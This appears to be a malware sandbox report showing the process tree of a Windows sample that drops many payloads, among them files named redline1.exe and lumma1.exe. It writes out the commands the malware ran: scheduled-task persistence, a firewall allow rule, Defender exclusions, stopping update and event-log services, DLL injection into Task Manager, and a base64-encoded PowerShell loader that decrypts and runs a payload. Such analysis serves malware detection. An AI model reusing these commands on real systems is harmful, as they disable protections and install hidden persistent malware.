PID 6044 wrote to memory of 3932	6044	cmd.exe	118
PID 6044 wrote to memory of 3932	6044	cmd.exe	118
PID 6044 wrote to memory of 1288	6044	cmd.exe	119
PID 6044 wrote to memory of 1288	6044	cmd.exe	119
PID 6044 wrote to memory of 1288	6044	cmd.exe	119

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\3b03eb3e0d82d7f3773004e63315b4b739ccaf4a2d1f7ff67f96da3d49dcbe62.exe
"C:\Users\Admin\AppData\Local\Temp\3b03eb3e0d82d7f3773004e63315b4b739ccaf4a2d1f7ff67f96da3d49dcbe62.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:5844
- C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
  "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Suspicious use of WriteProcessMemory
  PID:5184
- - C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
    "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
    3⤵
    PID:5036
- - C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe
    "C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:1524
  - - C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
      "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:2616
    - - C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:5832
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:3904
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:5140
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        Checks computer location settings
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1156
        
        C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
        7⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5700
        
        C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2388
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
        7⤵
        
        PID:5276
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /C Y /N /D Y /T 3
        8⤵
        
        PID:4524
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5832 -s 360
        6⤵
        Program crash
        
        PID:3592
    - - C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:1444
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:740
    - - C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4472
    - - C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of WriteProcessMemory
        
        PID:5596
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:6044
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc stop GameServerClient
        7⤵
        Launches sc.exe
        
        PID:3932
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameServerClient confirm
        7⤵
        Executes dropped EXE
        
        PID:1288
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLink
        7⤵
        Launches sc.exe
        
        PID:5024
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameSyncLink confirm
        7⤵
        Executes dropped EXE
        
        PID:5048
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
        7⤵
        Executes dropped EXE
        
        PID:5608
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start GameSyncLink
        7⤵
        Executes dropped EXE
        
        PID:4976
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
        6⤵
        
        PID:3596
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc stop GameServerClientC
        7⤵
        Launches sc.exe
        
        PID:5208
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameServerClientC confirm
        7⤵
        Executes dropped EXE
        
        PID:3948
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc delete PiercingNetLink
        7⤵
        Launches sc.exe
        
        PID:4216
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove PiercingNetLink confirm
        7⤵
        Executes dropped EXE
        
        PID:3872
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
        7⤵
        Executes dropped EXE
        
        PID:2736
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start PiercingNetLink
        7⤵
        Executes dropped EXE
        
        PID:4136
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
        6⤵
        
        PID:908
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLinks
        7⤵
        Launches sc.exe
        
        PID:4228
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameSyncLinks confirm
        7⤵
        Executes dropped EXE
        
        PID:1148
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
        7⤵
        Executes dropped EXE
        
        PID:432
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start GameSyncLinks
        7⤵
        Executes dropped EXE
        
        PID:4668
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
        6⤵
        
        PID:1464
    - - C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2872
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        Checks processor information in registry
        
        PID:3052
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 1068
        7⤵
        Program crash
        
        PID:3944
    - - C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4588
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:5360
    - - C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:436
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe" /F
        6⤵
        Creates scheduled task(s)
        
        PID:2276
      - C:\Users\Admin\AppData\Local\Temp\1000258001\dl.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000258001\dl.exe"
        6⤵
        Executes dropped EXE
        
        PID:3660
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3660 -s 224
        7⤵
        Program crash
        
        PID:6044
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3660 -s 512
        7⤵
        Program crash
        
        PID:2632
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3660 -s 748
        7⤵
        Program crash
        
        PID:6124
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3660 -s 768
        7⤵
        Program crash
        
        PID:5968
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3660 -s 832
        7⤵
        Program crash
        
        PID:4792
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3660 -s 840
        7⤵
        Program crash
        
        PID:4936
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3660 -s 796
        7⤵
        Program crash
        
        PID:4572
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3660 -s 992
        7⤵
        Program crash
        
        PID:1940
      - C:\Users\Admin\AppData\Local\Temp\1000259001\toolspub1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000259001\toolspub1.exe"
        6⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        
        PID:2436
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2436 -s 460
        7⤵
        Program crash
        
        PID:5208
      - C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3288
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2488
        
        C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe"
        7⤵
        Executes dropped EXE
        Adds Run key to start application
        Checks for VirtualBox DLLs, possible anti-VM trick
        Drops file in Windows directory
        Modifies data under HKEY_USERS
        
        PID:5944
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6040
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        8⤵
        
        PID:5724
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        9⤵
        Modifies Windows Firewall
        
        PID:1320
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:2452
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:1456
        
        C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        8⤵
        Executes dropped EXE
        
        PID:6132
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:880
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        9⤵
        Creates scheduled task(s)
        
        PID:3044
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        9⤵
        
        PID:5228
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:5232
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:432
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:3168
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        9⤵
        Executes dropped EXE
        
        PID:2972
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        9⤵
        Creates scheduled task(s)
        
        PID:2968
        
        C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        9⤵
        
        PID:4956
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5944 -s 720
        8⤵
        Program crash
        
        PID:5608
      - C:\Users\Admin\AppData\Local\Temp\1000261001\FirstZ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000261001\FirstZ.exe"
        6⤵
        Executes dropped EXE
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:2452
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:892
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        7⤵
        
        PID:1424
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        8⤵
        
        PID:4792
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        7⤵
        Launches sc.exe
        
        PID:428
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        7⤵
        Launches sc.exe
        
        PID:3600
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        7⤵
        Launches sc.exe
        
        PID:216
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        7⤵
        Launches sc.exe
        
        PID:5024
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        7⤵
        Launches sc.exe
        
        PID:1416
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3888
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:224
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2212
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5292
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "WSNKISKT"
        7⤵
        Launches sc.exe
        
        PID:1320
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:4228
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
        7⤵
        Launches sc.exe
        
        PID:4744
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        7⤵
        Launches sc.exe
        
        PID:2972
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "WSNKISKT"
        7⤵
        
        PID:1476
    - - C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe"
        5⤵
        Executes dropped EXE
        
        PID:5376
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgANQAwADAAMAApAAoACgAkAFQAZQBtAHAARABpAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAKACQAUABhAHQAdABlAHIAbgAgAD0AIAAnAGYAaQBsAGUALQAqAC4AcAB1AHQAaQBrACcACgAkAEwAYQB0AGUAcwB0AEYAaQBsAGUAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAVABlAG0AcABEAGkAcgAgAC0ARgBpAGwAdABlAHIAIAAkAFAAYQB0AHQAZQByAG4AIAB8ACAAUwBvAHIAdAAtAE8AYgBqAGUAYwB0ACAATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBGAGkAcgBzAHQAIAAxAAoACgBmAHUAbgBjAHQAaQBvAG4AIADjicZbIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAKWUGVMsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABFUz5EsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAHBlbmMKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAKBSxltoViAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJACgUsZbaFYuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJACgUsZbaFYuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkAOOJxltoViAAPQAgACQAoFLGW2hWLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQApZQZUywAIAAkABFUz5EpAAoAIAAgACAAIAAkAOOJxltwZW5jIAA9ACAAJADjicZbaFYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAHBlbmMsACAAMAAsACAAJABwZW5jLgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkAOOJxltwZW5jCgB9AAoACgAkAKWUGVMgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeABFAEMALAAgADAAeAA2AEYALAAgADAAeAAzADYALAAgADAAeAAwAEUALAAgADAAeAAyAEMALAAgADAAeAA0ADYALAAgADAAeAAwADMALAAgADAAeAA4AEMALAAgADAAeABCADUALAAgADAAeABGAEYALAAgADAAeAAxADAALAAgADAAeABBADUALAAgADAAeAAyADUALAAgADAAeAA4AEIALAAgADAAeAAxAEIALAAgADAAeAA3ADkALAAgADAAeABCAEMALAAgADAAeABBADUALAAgADAAeAAzADkALAAgADAAeAA0ADgALAAgADAAeABFADIALAAgADAAeAA2ADIALAAgADAAeAA4ADUALAAgADAAeAAyADgALAAgADAAeAAzADcALAAgADAAeABCAEYALAAgADAAeAA0ADEALAAgADAAeABBAEQALAAgADAAeAAxADgALAAgADAAeAAxADYALAAgADAAeAA5AEMALAAgADAAeAAwAEQAKQAKACQAEVTPkSAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADUARgAsACAAMAB4AEYAQwAsACAAMAB4ADgAQwAsACAAMAB4ADcAQwAsACAAMAB4ADMAOQAsACAAMAB4ADcANQAsACAAMAB4ADAAOQAsACAAMAB4AEYAQwAsACAAMAB4AEIAOQAsACAAMAB4ADcAMQAsACAAMAB4AEYAQwAsACAAMAB4AEUAQgAsACAAMAB4ADQAQQAsACAAMAB4AEUARQAsACAAMAB4AEIARgAsACAAMAB4ADcANgApAAoACgBpAGYAIAAoACQATABhAHQAZQBzAHQARgBpAGwAZQAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAIdl9k7vjYRfIAA9ACAAJABMAGEAdABlAHMAdABGAGkAbABlAC4ARgB1AGwAbABOAGEAbQBlAAoAIAAgACAAIAAkAKBSxltXW4KCIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAIdl9k7vjYRfKQA7AAoAIAAgACAAIAAkAOOJxluFUblbIAA9ACAA44nGWyAALQCllBlTIAAkAKWUGVMgAC0AEVTPkSAAJAARVM+RIAAtAHBlbmMgACQAoFLGW1dbgoIKAAoAIAAgACAAIAAkAAt6j17GliAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQA44nGW4VRuVspACkAOwAKACAAIAAgACAAJABlUeNTuXAgAD0AIAAkAAt6j17Gli4ARQBuAHQAcgB5AFAAbwBpAG4AdAA7AAoAIAAgACAAIAAkAGVR41O5cC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:764
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3172
        
        C:\Users\Admin\Pictures\wp2E7KlkjN7XIvdMIzdwfiF6.exe
        
        "C:\Users\Admin\Pictures\wp2E7KlkjN7XIvdMIzdwfiF6.exe"
        8⤵
        Executes dropped EXE
        
        PID:4660
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 456
        9⤵
        Program crash
        
        PID:4448
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 500
        9⤵
        Program crash
        
        PID:4028
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 756
        9⤵
        Program crash
        
        PID:4604
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 776
        9⤵
        Program crash
        
        PID:5716
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 616
        9⤵
        Program crash
        
        PID:4168
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 808
        9⤵
        Program crash
        
        PID:5764
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 968
        9⤵
        Program crash
        
        PID:2364
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 988
        9⤵
        Program crash
        
        PID:5300
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 1064
        9⤵
        Program crash
        
        PID:4452
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 1348
        9⤵
        Program crash
        
        PID:776
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "wp2E7KlkjN7XIvdMIzdwfiF6.exe" /f & erase "C:\Users\Admin\Pictures\wp2E7KlkjN7XIvdMIzdwfiF6.exe" & exit
        9⤵
        
        PID:6104
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "wp2E7KlkjN7XIvdMIzdwfiF6.exe" /f
        10⤵
        Kills process with taskkill
        
        PID:5748
        
        C:\Users\Admin\Pictures\ZYBf0ogkuHSq2r9zBCegj8Ge.exe
        
        "C:\Users\Admin\Pictures\ZYBf0ogkuHSq2r9zBCegj8Ge.exe"
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3980
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2060
        
        C:\Users\Admin\Pictures\ZYBf0ogkuHSq2r9zBCegj8Ge.exe
        
        "C:\Users\Admin\Pictures\ZYBf0ogkuHSq2r9zBCegj8Ge.exe"
        9⤵
        Executes dropped EXE
        
        PID:5512
        
        C:\Users\Admin\Pictures\pjGjQPhLGvu2xHuMA86i08A7.exe
        
        "C:\Users\Admin\Pictures\pjGjQPhLGvu2xHuMA86i08A7.exe"
        8⤵
        Executes dropped EXE
